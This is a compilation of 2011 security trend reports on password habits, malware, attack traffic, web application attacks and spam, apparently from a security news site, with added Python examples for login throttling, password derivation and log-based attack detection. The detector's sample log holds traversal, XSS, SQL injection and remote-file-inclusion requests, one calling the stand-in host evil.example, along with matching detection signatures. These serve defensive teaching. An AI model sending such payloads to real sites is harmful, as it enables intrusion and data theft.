
Password use and management
Date: 2011-10-03
From logging on to a corporate network or conducting online banking, to accessing social media or unlocking a mobile phone, passwords are the default and almost ubiquitous first (and often only) line of security for online accounts. Depending upon how they are used and maintained, they can be a powerful first line of defence in protecting personal information and privacy or at worst a time-wasting interruption, lulling users into a false sense of security.
Confidentiality is one of the three aspects (along with Integrity and Availability) of trustworthy computing and a critical element of computer security. To work, it requires authentication mechanisms, such as passwords, to safeguard access to information. Traditionally, to ensure confidentiality of a system, two procedures are used: identification (User ID), to identify the user; and authentication, to verify that the user is the legitimate owner of the ID. It is the latter stage that requires a password.
Passwords are secret words or phrases and ideally should contain a string of letters, characters and numbers (this makes it harder to guess). They may be machine generated or allocated by the provider of the service, but in most cases are user-generated.
The types of passwords we select are dictated to some extent by the policies of the organisations with which we interact online. Some may require passwords of a minimum length; some may require a password of an exact length; some may force us to use numbers and characters; while others may have no overt structural requirements at all.
The following document outlines a survey commissioned by The Centre for Internet Safety (CIS) and PayPal, examining consumer behaviours and perceptions relating to their use of online passwords. The survey focuses on user behaviour and attitudes towards the use of passwords, such as whether users consider them secure, and their habits relating to remembering and changing them. We asked a broad cross section of Australians about their attitudes to password security. The survey was completed by over 1000 respondents, with an even split of male/female respondents. At the end of this document is a simple guide to generating and maintaining safer passwords, but at a minimum passwords should:
· not be a proper noun
· not be a common word (out of the dictionary), and
· not be identifiable in relation to the user ID.
How criminals abuse passwords
Online criminals capture passwords in several ways, each necessitating different security behaviours on the part of both the consumer and the provider of the online service.
1. Trickery
Online criminals may manufacture an email address and/or a website mimicking a real company, and convince users to enter or provide their passwords (phishing), or convince the password owner to disclose passwords by providing a plausible story or reason (social engineering).
Consumer defence: Type in the URL of the legitimate website and implement security software to identify false websites. Consider the legitimacy of emails and other approaches.
Service provider defence: Actively monitor for fake websites and spam emails using your brand. Work with CERTs and security companies to take down and block offending sites where possible. Build internal capacity to monitor user accounts for anomalous behaviour.
2. Theft
Online criminals may deploy malicious computer software onto victim computers, or the websites they use, in order to steal passwords (and other information).
Consumer/service provider defence: Implement security software, educate system users, regularly patch operating system and applications.
3. Gaming
Online criminals may present themselves to the company providing the online service and pretend to have forgotten “their” password. They then provide the necessary personal details (like answers to the “secret question”) to have a new password issued to them.
Consumer defence: Choose a secret question it is likely only you know the answer to (do not have the answer contained on any social networking site, for example).
Service provider defence: Tighten automated forgotten password processes and educate frontline customer support staff. Build internal capacity to monitor user accounts for anomalous behaviour.
4. Guessing
Online criminals may attempt to access accounts by entering common passwords or by using information they know about the user to guess their password (for example, knowing their favourite football team) – often this information is now obtained from social networking sites.
Consumer defence: Choose a password that is difficult to guess, including numbers and characters. Do not have a password that relates to any personal information readily identifiable via social networking sites.
Service provider defence: Limit the number of failed login attempts allowed. Implement minimum standards for consumer password strength.
5. Brute force attack
Cyber criminals bombard the online service with passwords until the correct password is entered.
Service provider defence: Limit the number of failed login attempts allowed. Implement minimum standards for consumer password strength.
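The "limit the number of failed login attempts" defence listed for guessing and brute-force attacks, worked through as an added Python example (this is not code from the survey or from any service it mentions): a per-account sliding-window counter that locks the account once a number of wrong passwords arrive inside the window. The thresholds (five failures in fifteen minutes, fifteen-minute lockout), the in-memory user table and the function names are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque

# Assumed policy values for the illustration (not from the survey):
# five failures within fifteen minutes lock the account for fifteen minutes.
MAX_FAILURES = 5
WINDOW_SECONDS = 15 * 60
LOCKOUT_SECONDS = 15 * 60


class LoginThrottle:
    """Per-account failed-attempt counter with a sliding window and lockout."""

    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS,
                 lockout=LOCKOUT_SECONDS):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self._failures = defaultdict(deque)   # account -> failure timestamps
        self._locked_until = {}               # account -> unlock timestamp

    def is_locked(self, account, now=None):
        """True while a lockout is in force; expired lockouts are cleared."""
        now = time.time() if now is None else now
        until = self._locked_until.get(account)
        if until is None:
            return False
        if now >= until:
            del self._locked_until[account]
            self._failures[account].clear()
            return False
        return True

    def record_failure(self, account, now=None):
        """Record a wrong password; returns True if the account is now locked."""
        now = time.time() if now is None else now
        q = self._failures[account]
        q.append(now)
        while q and now - q[0] > self.window:   # forget failures outside the window
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
            return True
        return False

    def record_success(self, account):
        """A correct password resets the counter."""
        self._failures[account].clear()
        self._locked_until.pop(account, None)


def attempt_login(throttle, users, account, password, now):
    """Returns 'locked', 'ok' or 'bad'.  `users` is a constructed dict of
    plaintext passwords; a real system compares salted password hashes."""
    if throttle.is_locked(account, now):
        return "locked"           # refused without even checking the password
    if users.get(account) == password:
        throttle.record_success(account)
        return "ok"
    throttle.record_failure(account, now)
    return "bad"


def simulate():
    """Six wrong guesses one second apart, then the right password: the
    correct password is refused while the lockout lasts and accepted after."""
    users = {"alice": "correct-horse"}   # constructed sample account
    throttle = LoginThrottle()
    results = []
    for i in range(6):
        results.append(attempt_login(throttle, users, "alice", "guess%d" % i, now=1000 + i))
    results.append(attempt_login(throttle, users, "alice", "correct-horse", now=1010))
    results.append(attempt_login(throttle, users, "alice", "correct-horse",
                                 now=1010 + LOCKOUT_SECONDS))
    return results


if __name__ == "__main__":
    print(simulate())
```

A per-account lockout on its own lets anyone who knows a username lock its owner out, so deployments normally pair it with per-source rate limiting and an alert when one account or one address trips the limit repeatedly.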
Nearly two thirds (63%) of respondents use the same password across more than one online account. Interestingly, this number grows to 77% when looking at the 18-24 year old category. This finding suggests that many Internet users underestimate the threat from cyber criminals who abuse this habit: stealing passwords via one site and then attempting to replay them across others.
Critical to the use of the same password for multiple logins is how often users change their passwords. Nearly half (48%) of respondents said they only changed their passwords when required to by a system. 7% never do.
While time consuming – and possibly resulting in more forgotten passwords initially – regularly changing passwords can be a very effective tool in keeping accounts secure. Since there is an active blackmarket trade in passwords between criminals, the habit of changing passwords degrades the value of that criminal economy: the stolen password is useless once it has been changed by the owner.
Password guessing attacks can be mitigated by consumers ensuring that passwords are sufficiently complex and by system operators limiting the frequency of authentication attempts. A pleasing result is that over three quarters (78%) of respondents said their passwords didn’t contain any personally identifying information.
Only 10% of respondents thought their online passwords could be easily guessed.
These last two results are in contrast to analysis of large-scale public password breaches (such as Sony’s recent losses, and others from web-based email services and social networking sites). Analysis of those breaches shows that users still use dictionary words, names and nicknames, and rarely use numbers and symbols.
In a more troubling set of results, 41% of survey respondents (63% of 18-24 year olds) have shared their password with a friend, family member or work colleague, with only one third (36%) having changed the password since sharing.
46% of respondents store their passwords on a piece of paper. In itself, this is a harmless practice assuming that the piece of paper is not stuck to the computer hardware and is stored in a separate location. 18-24 year olds use paper to store their passwords, but they also like to store passwords on their mobile phones.
41% of respondents forget at least one of their online passwords once a month and have a new one emailed to them. Social engineering attacks, in particular phishing attacks, often pretend to be an official system administrator seeking to trick a user into resetting a password.
It was pleasing to discover nearly all (96%) of respondents say they take care to protect their personal information when using a public computer, like those found in a library, internet café or an airline lounge. It is unclear how they actually protect themselves, however, as using such services is inherently risky. In addition, over a third (36%) never ticked ‘yes’ when asked by a website to remember their details. Some websites have this option pre-selected and can easily fool a user. This is a critical issue for those using shared or public computers, as the next user may be able to gain access to the previously logged in application.
A third (36%) of respondents remain logged into online accounts, such as social media, including on their mobile phones. 76% of 18-24 year olds remained logged into such online accounts. This is potentially dangerous, especially if the phone is not locked (or set to auto lock within a short period).
Guide to creating and managing a secure password
1. Take stock of your current passwords
· The first step is to work out how many passwords you actually have – this can take time, as most people have a number of accounts online, ranging from bank accounts to social media platforms to newsletters
· Allocate a unique password to each account – do not use the same password across multiple online accounts
2. Create your passwords
· When creating a password, do not use personal information such as your name, your address, your birthday, your nickname, pet’s or children’s names, or your place of work.
· Avoid using words you can find in a dictionary, people’s names, or phrases that can be easily guessed.
· Choose a password with the following criteria: at least 1 number, 1 special character, 1 uppercase letter, and ensure it is at least 8 characters long.
Here is one way of generating a harder to guess password:
· Think of a phrase like “I love it when it rains on weekends!”
· Take the first letter from each word: Iliwirow!
· Convert the letter “o” to a zero: Iliwir0w!
· We now have a 9 character password with a capital, a number and a special character
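The four steps above carried through in code, as an added example that is not part of the guide: `passphrase_to_password` takes the first character of each word (keeping punctuation that ends a word, which is how the guide's "!" survives) and applies the letter-to-digit substitution, and `check_policy` tests the criteria from step 2 (at least 8 characters, a number, an uppercase letter and a special character). The function names and the exact policy checks are mine.

```python
import re

# The guide's criteria: at least 8 characters including at least one
# number, one special character and one uppercase letter.
MIN_LENGTH = 8
DEFAULT_SUBSTITUTIONS = {"o": "0"}   # the guide's letter-to-digit swap


def passphrase_to_password(phrase, substitutions=None):
    """Steps 1-3 of the guide: first character of every word (keeping any
    punctuation that ends a word, so the '!' survives), then substitute."""
    if substitutions is None:
        substitutions = DEFAULT_SUBSTITUTIONS
    pieces = []
    for word in phrase.split():
        pieces.append(word[0])
        trailing = re.search(r"[^\w]+$", word)   # e.g. the '!' of 'weekends!'
        if trailing and len(word) > 1:
            pieces.append(trailing.group(0))
    initials = "".join(pieces)
    return "".join(substitutions.get(ch, ch) for ch in initials)


def check_policy(password):
    """Return the list of guide criteria the password fails (empty = passes)."""
    failures = []
    if len(password) < MIN_LENGTH:
        failures.append("shorter than %d characters" % MIN_LENGTH)
    if not re.search(r"[0-9]", password):
        failures.append("no number")
    if not re.search(r"[A-Z]", password):
        failures.append("no uppercase letter")
    if not re.search(r"[^A-Za-z0-9\s]", password):
        failures.append("no special character")
    return failures


def derive_and_check(phrase):
    """Convenience wrapper: the derived password and the criteria it fails."""
    password = passphrase_to_password(phrase)
    return password, check_policy(password)


if __name__ == "__main__":
    print(derive_and_check("I love it when it rains on weekends!"))
```

Running it on the guide's phrase reproduces "Iliwir0w!", and the policy check returns an empty list for it; a plain dictionary word such as "password" fails three of the four criteria.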
3. Manage your passwords
· Never share your password with anyone. Simple.
· Change your passwords regularly – not only when you are prompted to change them by your online accounts. A good start is to change all your online passwords when daylight saving time comes into effect and stops.
· When entering your password on a public computer, be aware that others may be watching you type or recording what you are doing using malware. Change your password asap upon returning to your usual computer.
· If you can’t remember all your passwords, avoid saving them on your desktop or your mobile device, but rather write them down and keep this in a safe place away from your computer.
11 Mehr 1390, Tags: Analytical reports
Security threat report of Sophos in mid-year 2011
The security company Sophos has studied the security threats of the first half of 2011 in a report. The following is a brief summary of that report.
1) Web Threats: A new threat every 4.5 seconds
Cybercriminals take advantage of our almost constant use of the web to launch malicious attacks. As a result, the web remains the biggest way cybercriminals distribute their malicious goods. During the first half of 2011, we saw an average of 19,000 new malicious URLs every day—that's one every 4.5 seconds.
Many computer users still don’t realize that something nasty can infect their computer when they visit a seemingly legitimate website. Yet more than 80% of the malicious URLs we found are legitimate websites hacked by cybercriminals. They achieve this by exploiting vulnerabilities in the software or by stealing access credentials from malware infected machines.

The U.S. still holds the top spot on the list of countries hosting malware, although the total percentage of malware hosted by the U.S. declined slightly during the first half of 2011, down 1.4 points from 39.39% in 2010. The Russian Federation now claims the number two spot, a position held by France last year.

Fake Antivirus: Security scams reap millions
In 2010, fake antivirus was one of the more persistent threats of the year. In the first half of 2011, fake antivirus remained a threat, and these attacks are now actively targeting Mac users.
Many fake antivirus scams still target Windows users, and we see Mac fake antivirus software spreading in greater numbers than ever before. In some cases, scammers infect Macs to automatically open pornographic websites periodically—as further incentive to have users purchase the so-called "fix."
SEO Poisoning: Gateway for malicious behavior
The search engine is our gateway to the web. That’s why cybercriminals manipulate search results from sites such as Google, Bing and Yahoo to lure victims to their malicious pages. Search engine optimization, or SEO, is a standard Internet marketing technique used by most companies to draw people to their sites. But it can also be abused. When the bad guys exploit SEO, it’s known as SEO poisoning, or Black Hat SEO.
Attackers use SEO poisoning techniques to rank their sites highly in search engine results and to redirect users to malicious sites.

Black Hat SEO attacks are extremely effective. A snapshot of the top malware we block on our customer web appliances shows that Black Hat SEO accounts for more than 30% of all detections.

2) Operating Systems (OS): Mac malware is now real

We ran a poll on the Sophos Facebook page asking folks if they would now recommend that friends and family install antivirus software on their Macs. Of the 968 people who answered the poll, 89% said yes.

Microsoft Windows: Malware targeting Windows XP still dominates

The most recent report, Microsoft’s tenth Security Intelligence Report, shows an increase in malware targeting Windows 7, which is now installed in about a quarter of all Windows computers. Although there was a drop-off in new malware targeting XP, used by about half of all Windows users, Windows XP malware still accounts for the majority of malware written for Windows to date.

3) Mobile: Mini computers in your pocket

A recent Sophos survey asked IT security professionals across multiple countries about mobile device use and access to corporate resources. Out of more than 240 responses, all but 6% said that they allow mobile devices to access corporate resources. Access for BlackBerry and Windows mobile phone OS ranked highest.

The survey also revealed that over 85% of organizations have already established an acceptable use policy (AUP) within their organizations, yet only 69% of these organizations have specific policies for company-owned mobile device users. And, this number further decreases when you consider policy for employee-owned mobile devices (31%).

4) Social Networking: Threats explode, so limit access to personal info
To see just how many security issues social networks pose, we recently conducted a social media poll that asked whether respondents’ organizations have encountered spam, phishing or malware incidents. Of the nearly 2,000 people polled, 71% reported that they, or one of their colleagues, had been spammed on a social networking site, 46% had been phished and 45% were sent malware. The remaining respondents were divided—some were not victims, others were unsure.

Our recent social networking poll also asked computer users which social network they felt posed the biggest security risk. Facebook is clearly seen as the biggest risk with 81% of the votes, a significant rise from the 60% who felt Facebook was the riskiest when we first asked the question a year ago. Twitter and MySpace each received 8% of the votes this year, and LinkedIn only 3%.

5) Email Spam and Spearphishing: Still a threat
A recent comScore report shows a whopping 59% decline in the use of email among 12- to 17-year olds, and a 34% decline for the 25 to 34 age bracket. Facebook, text messaging and Twitter have taken over as preferred communication methods for many.
As compared to 0.27% of email attachments containing threats in the first quarter of 2010, just 0.16% contained threats in the first quarter of 2011. Scammers now use more HTML attachments rather than just “.exe” executable files as vehicles to deliver malware.

The U.S. once again leads the field of spam-relaying countries, contributing approximately 13% of the world's spam traffic in the first half of 2011. India, Russia, South Korea and Brazil broke through the 6% barrier during the first six months of the year, with their massive online populations clearly lacking the protection needed to keep their systems free from spamming malware.

6) Removable Media: Beware of Windows Autorun
Between March and May of this year, there was a significant drop in the number of computers being infected by malware exploiting the Windows Autorun feature. Autorun infections dropped by 59% on XP machines and by 74% on computers running Windows Vista.

However, a recent study conducted by the U.S. Department of Homeland Security (DHS) discovered that the biggest risk from removable media might come from poor decision-making by users. According to a Bloomberg report, the DHS study found that government employees showed carelessness in using thumb drives and CDs.

Security Threat Report, Mid-Year 2011, Sophos
6 Shahrivar 1390, Tags: Analytical reports
The State of the Internet, 1st Quarter of 2011
Date: 2011-08-03
Each quarter, Akamai Technologies publishes its "State of the Internet" report. Akamai’s globally distributed network of servers allows them to gather massive amounts of information on many metrics, including connection speeds, attack traffic, and network connectivity/availability/latency problems, as well as traffic patterns on leading Web sites. This report includes data gathered from across Akamai’s global server network during the first quarter of 2011 about attack traffic, broadband adoption, and mobile connectivity, as well as trends seen in this data over time.
Attack Traffic, Top Originating Countries
During the first quarter of 2011, Akamai observed attack traffic originating from 199 unique countries/regions, down from 207 at the end of 2010. As shown in the following figure, the first quarter saw several changes in the list of the top 10 attack traffic sources, with Myanmar making its first appearance in the history of the report, India appearing for the first time since the fourth quarter of 2009, and Hong Kong appearing for the first time since the third quarter of 2008. Among the countries/regions more frequently seen on the top 10 list, the United States and Taiwan were responsible for higher percentages of attack traffic as compared to the prior quarter, while Russia, China, Brazil, Romania, and India all saw their percentages decline quarter-over-quarter.
This sudden appearance of Myanmar on the list of top attack traffic sources is certainly unusual, and appears to be related to attack traffic targeting Port 80 observed by Akamai in late February and early March. Interestingly, Myanmar managed to be responsible for 13% of the observed attack traffic in the first quarter even though only 25 unique ports were targeted, and of that, over 45% of the attacks targeted Port 80. Contrast that with the United States, with 10% of the observed attack traffic and tens of thousands of targeted ports – very strongly indicative of general port scanning activity, as opposed to specifically targeted attacks.
Aggregating observed attack traffic at a continental level, we find that nearly half of the observed attack traffic came from the Asia Pacific/Oceania region, nearly 30% came from Europe, and just over 20% came from the Americas.
Attack Traffic, Top Ports
Attack traffic concentration among the top 10 ports continued to drop from the concentration seen in the fourth quarter of 2010, with the top 10 ports responsible for just 65% of the observed attacks (down from 72% in the fourth quarter). Perpetual top target Port 445 (Microsoft-DS) dropped nearly 25% from the prior quarter, and Ports 23 (Telnet) and 22 (SSH) also saw significant percentage declines. However, Port 80 (WWW) saw attack traffic levels over 7x higher than at the end of 2010, and the percentage of attacks targeting Port 443 (HTTPS/SSL) also saw a massive increase over the prior quarter. As noted above, it is likely that the growth in attack traffic targeting Port 80 and Port 443 is related to the attacks observed to be originating from Myanmar and Hong Kong. The ongoing decline of attacks on Port 445 continues to underscore the success of efforts to mitigate the threat posed by the Conficker worm, which is now over three years old. A report released by the Conficker Working Group in January 2011 claimed success in ultimately stopping Conficker from communicating with its creator, thus preventing it from updating into newer and more dangerous variants, though it also noted that Conficker still resides on anywhere from four million to 13 million computers across the world.
As shown in the top figure, in addition to Port 443’s first appearance in the list, Port 21 appears on the top ports list for the first time this quarter as well.
Attack Traffic From Mobile Networks, Top Originating Countries
In reviewing Figure 21, we find that the distribution of attack traffic sourced in mobile networks during the first quarter of 2011 had a fairly similar distribution to that seen in the prior quarter, though some countries saw slightly higher percentages, while others were slightly lower. Italy remained responsible for the largest percentage of observed attacks, but dropped to 25% (from 30%) this quarter. Of the top 10 countries, eight of them were also found on the list last quarter – the United Kingdom and Russia dropped out of the top 10, while Argentina and Australia replaced them on the list. The top 10 countries were the source of just under three-quarters of observed attacks.
Attack Traffic From Mobile Networks, Top Ports
In the first quarter of 2011, nine of the top 10 ports targeted by attack traffic sourced in mobile networks were the same as in the fourth quarter of 2010. In this quarter, Port 5900 (VNC Server) dropped from the list, replaced by Port 443 (HTTPS/SSL). The appearance of Port 443 on this list is in line with the massive growth in overall attack traffic targeting the port noted in Section 1.2 above. As shown in Figure 22, attack concentration continued to grow in the first quarter, with Port 445 responsible for 80% of the observed attacks, and the top 10 ports responsible for just over 97% of observed attacks. Interestingly, China was the only country among the top 10 that did not originate any attack traffic targeting Port 445.
The State of the Internet, 1st Quarter, 2011 Report, Volume 4, Number 1
11 Mordad 1390, Tags: Analytical reports
Web Application Attacks
Date: 2011-07-31
Web applications, on average, experience twenty-seven attacks per hour, or roughly one attack every two minutes, according to Imperva. Imperva observed and categorized attacks across 30 applications as well as onion router (TOR) traffic, monitoring more than 10 million individual attacks targeted at web applications over a period of six months.

The analysis shows:
  • When websites came under automated attack they received up to 25,000 attacks in one hour, or 7 attacks every second.
  • Four dominant attack types comprise the vast majority of attacks targeting web applications: Directory Traversal, Cross-Site Scripting, SQL injection, and Remote File Inclusion.

Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results.

These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Further, automation also means that attacks are equal opportunity offenders - they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations.

Over 61 percent of the attacks monitored originated from bots located in the United States, although conclusions cannot be made regarding from which geography these bots are controlled.

Attacks from China made up almost 10 percent of all attack traffic, followed by attacks originating in Sweden and France.

According to the data, the amount of XSS traffic is growing:

Below you can see the distribution of search engine crawlers observed following the maliciously-crafted XSS links.

According to this comparison, Yahoo is the most susceptible to SEP-related XSS, while Google apparently filters most of these links.

Technical recommendations

Automated attack detection requires collecting data, combining it and then analyzing it automatically in order to extract relevant information and apply security countermeasures. Gathering the required data requires monitoring protocol anomalies even if they are not malicious or if the web application is not vulnerable.

Combining this data with intelligence gathered on known malicious sources will help enlarge the knowledge base for identifying attacks and selecting appropriate attack mitigation tools. Here are 5 tips for the security team:

1. Deploy security solutions that deter automated attacks.

2. Detect attacks on known vulnerabilities - the security organization needs to be aware of known vulnerabilities and keep an up-to-date list in order to know what can and will be exploited by attackers.

3. Acquire intelligence on malicious sources and apply it in real time.

4. Participate in a security community and share data on attacks.

5. Detect automated attacks early - quickly identifying thousands of individual attacks as one attack allows you to prioritize your resources more efficiently and can help in the detection of previously unknown attack vectors included in the attack.
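Tip 5 ("identifying thousands of individual attacks as one attack") together with the four dominant attack types named earlier, as an added Python example that is not code from the Imperva report: it parses constructed Apache combined-format log lines, tags requests that match simple signatures for directory traversal, cross-site scripting, SQL injection and remote file inclusion, and then groups attack events per source IP so that a burst inside one minute is reported as a single automated campaign rather than as five separate alerts. The log lines, addresses (documentation ranges), the placeholder domain, the signatures and the thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not from the report); the
# addresses are documentation ranges and the domain is a placeholder.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jul/2011:13:05:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2011:13:05:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 801 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2011:13:05:02 +0000] "GET /item?id=1%27%20UNION%20SELECT%20user,pass%20FROM%20users-- HTTP/1.1" 500 230 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2011:13:05:03 +0000] "GET /theme/x.php?page=http://evil.example/inc.txt HTTP/1.1" 404 130 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2011:13:05:03 +0000] "GET /admin/?file=..%2F..%2Fboot.ini HTTP/1.1" 404 130 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jul/2011:13:07:44 +0000] "GET /about.html HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jul/2011:13:09:10 +0000] "GET /item?id=5 HTTP/1.1" 200 950 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Deliberately simple signatures for the four attack types named in the
# report; a production rule set is far larger and handles more encodings.
SIGNATURES = [
    ("directory_traversal", re.compile(r"\.\./|\.\.\\")),
    ("xss", re.compile(r"<\s*script|javascript:|onerror\s*=", re.I)),
    ("sqli", re.compile(r"union\s+select|'\s*(or|and)\s|--\s*$", re.I)),
    ("rfi", re.compile(r"=\s*(https?|ftp)://", re.I)),
]


def classify_request(path):
    """Attack category of a request path after URL decoding, or None."""
    decoded = unquote(path)
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return None


def parse_events(log_text):
    """Yield (ip, timestamp, category) for every request that matches a signature."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        category = classify_request(m.group("path"))
        if category is None:
            continue
        ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
        events.append((m.group("ip"), ts, category))
    return events


def find_campaigns(events, threshold=3, window_seconds=60):
    """Group attack events per source IP; an IP with `threshold` or more events
    inside `window_seconds` is reported once, as an automated campaign (tip 5)."""
    by_ip = defaultdict(list)
    for ip, ts, category in events:
        by_ip[ip].append((ts, category))
    campaigns = {}
    for ip, items in by_ip.items():
        items.sort()
        times = [t for t, _ in items]
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1          # slide the window forward
            if end - start + 1 >= threshold:
                campaigns[ip] = {"events": len(items),
                                 "categories": sorted({c for _, c in items})}
                break
    return campaigns


def analyze(log_text=SAMPLE_LOG):
    events = parse_events(log_text)
    return {"events": events, "campaigns": find_campaigns(events)}


if __name__ == "__main__":
    result = analyze()
    for ip, ts, category in result["events"]:
        print(ip, ts.isoformat(), category)
    print(result["campaigns"])
```

On the sample, the five requests from 198.51.100.7 collapse into one campaign record covering all four attack types, while the two ordinary requests from 203.0.113.9 produce nothing; decoding the path before matching is what catches the `%2F`-encoded traversal.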
Imperva’s Web Application Attack Report, Edition #1 - July 2011
9 Mordad 1390, Tags: Analytical reports
Internet Threats Trend Report, 3rd Quarter of 2011
Date: 2011-07-27
Commtouch Labs has studied Internet threat trends in the second quarter of 2011. A brief summary of the report follows.
Spammer tactics are changing
In mid-March, Microsoft led a takedown of the Rustock botnet. The immediate effect on spam levels was a drop of nearly 30% to an average of 119 billion messages per day during the last two weeks of March. In the past, botnet takedowns have resulted in temporary drops in spam levels followed by sustained increases, as spammers created new botnets and resumed mass mailings. The spam levels of this quarter however, suggest that the expected “recovery” of spam might not occur in the near term, and that spammers are changing their tactics. Average daily spam levels for the past year are shown below:

June’s spam level (106 billion) is the lowest in over 3 years. At its lowest point in June, spam accounted for 75% of all emails.
The new tactic therefore calls for the use of compromised accounts to send spam as opposed to using botnets. The move away from botnet spam can be attributed to the use of IP reputation mechanisms that have been increasingly successful in blacklisting zombie IP addresses and therefore blocking botnet spam. The blocking of spam from compromised accounts based on IP address is more difficult for many anti-spam technologies, since these accounts exist within whitelisted IP address ranges.
While spam from compromised accounts is less likely to get blocked by IP reputation systems, the volumes that can be sent are lower due to the thresholds imposed on these accounts. This at least partially accounts for the lower spam volumes seen this quarter.
Analysis of compromised accounts
In addition to the spoofed emails (shown above), a percentage of the emails from Gmail and Hotmail actually come from genuine accounts. These can be compromised accounts or accounts specifically created by spammers for this purpose. The graph below illustrates the percentage of spam received over a trial period this quarter where the “from” field includes Gmail and Hotmail. Based on the IP address, received spam could either be:
  • Sent from a zombie with a phony Gmail or Hotmail address in the from field
  • Or, sent from a compromised or spammer account at Gmail or Hotmail
As shown, almost 30% of the spam from Hotmail actually comes from compromised or spammer Hotmail accounts. Gmail spam, on the other hand, is mostly from zombies that simply forge their Gmail addresses.
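The two cases the report separates (a zombie forging a Gmail or Hotmail address versus a genuine, compromised or spammer-created account at the provider), as an added Python example that is not Commtouch's code: each sample is classified by checking whether the connecting IP address falls inside the address ranges the claimed provider actually sends from. The provider ranges here are placeholder networks from the documentation address space, the sample messages are constructed, and the function names are mine; a real check would load the providers' published SPF records instead.

```python
import ipaddress
import re
from collections import defaultdict

# Placeholder networks standing in for the two providers' published outbound
# mail ranges (constructed; a real check would load the providers' SPF records).
PROVIDER_RANGES = {
    "gmail.com": [ipaddress.ip_network("203.0.113.0/24")],
    "hotmail.com": [ipaddress.ip_network("198.51.100.0/24")],
}

# Constructed sample of (From header, connecting IP) pairs, not report data.
SAMPLES = [
    ("Alice <alice@gmail.com>", "203.0.113.15"),
    ("bob@gmail.com", "192.0.2.44"),
    ("promo@gmail.com", "192.0.2.45"),
    ("carol@hotmail.com", "198.51.100.9"),
    ("dave@hotmail.com", "192.0.2.46"),
]


def sender_domain(from_header):
    """Domain part of the address in a From header, lower-cased."""
    m = re.search(r"@([A-Za-z0-9.-]+)", from_header)
    return m.group(1).lower() if m else None


def classify_spam(from_header, connecting_ip):
    """The two cases from the report: the claimed provider really relayed the
    message (compromised or spammer account) or a zombie forged the address."""
    domain = sender_domain(from_header)
    ranges = PROVIDER_RANGES.get(domain)
    if ranges is None:
        return "other domain"
    ip = ipaddress.ip_address(connecting_ip)
    if any(ip in net for net in ranges):
        return "compromised or spammer account"
    return "zombie with forged address"


def summarize(samples=SAMPLES):
    """Count each class per claimed provider, as the report's graph does."""
    counts = defaultdict(lambda: defaultdict(int))
    for from_header, ip in samples:
        counts[sender_domain(from_header)][classify_spam(from_header, ip)] += 1
    return {domain: dict(c) for domain, c in counts.items()}


if __name__ == "__main__":
    for domain, breakdown in summarize().items():
        print(domain, breakdown)
```

The split matters for filtering: messages in the second class arrive from whitelisted provider addresses, so IP reputation alone will not stop them and content-based or per-account rate limits have to do the work, exactly the difficulty the report describes.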

Spam topics
Pharmacy spam remained in the top spot but continued to drop this quarter to only 24% (down from 28% in Q1 2011). 419 fraud, phishing, and pornography all increased.

Malware trends
The second quarter included malware distributed using a variety of methods - several of these are shown below.
SEO poisoning leads to fake antivirus
One of the methods of distributing malware is the use of SEO (Search Engine Optimization) technique and pushing fake antivirus links in the search results.
PDF malware
PDF files as well as executables disguised as PDF files were used in numerous attacks during Q2 2011. Two examples are shown below. In the first example the zip file extracts to an executable file, but the icon shown is that of an Adobe Acrobat PDF file. Users with file extension view disabled on their computers will see a PDF icon and think the file is simply a PDF. When the file is executed, it shows a non-malicious PDF file in a fake PDF reader window.
The malware then does the following:
  • Captures all keystrokes and activities as users browse the internet.
  • Saves the stolen keylogging information in the file on the user’s hard drive – “updates2.txt”.
  • Sends the keylogger file to the malware owner via e-mail.
The second example of PDF malware uses complex coding to hide a malicious JavaScript within the PDF file.
Web Security
Compromised sites
Cybercriminals often hack websites to hide phishing pages or malware. This provides them with two main advantages:
1) The legitimate domain probably has a good reputation from the point of view of most URL filtering engines and is therefore not likely to be blocked.
2) The compromised site provides free hosting for the malware or phishing page.
The following table shows the categories of sites that have been compromised.

Phishing Trends
Phishing attacks continued to target local and global banks, Web email users, Facebook accounts, and even online gaming sites.
In order to provide protection from keyloggers, some financial institutions have added more complex login pages including virtual keyboards. Phishers have kept up with this trend. The phishing page for ADCB (Abu Dhabi Commercial Bank) successfully simulated the virtual keyboard found on the real site.
During the second quarter of 2011, sites related to games were the greatest target of phishing attacks. The following table shows the categories of sites that have been targets of phishing attacks.

Zombie trends
The second quarter saw an average turnover of 377,000 zombies each day that were newly activated for malicious activity, like sending malware and spam. This number shows a substantial increase compared to the 258,000 of the first quarter of 2011.
The following chart shows the newly activated zombies from April to June 2011.
India again claimed the top zombie producer title, hosting 17% of the global zombie population. Brazil, Vietnam and the Russian Federation take the next places.

Internet Threats Trend Report, July 2011, Commtouch

5 Mordad 1390, Tags: Analytical reports
The state of spam in May
Date: 2011-06-23
The security company AppRiver has studied the state of spam in May. A summary of the report follows.
Total Email Traffic Volume
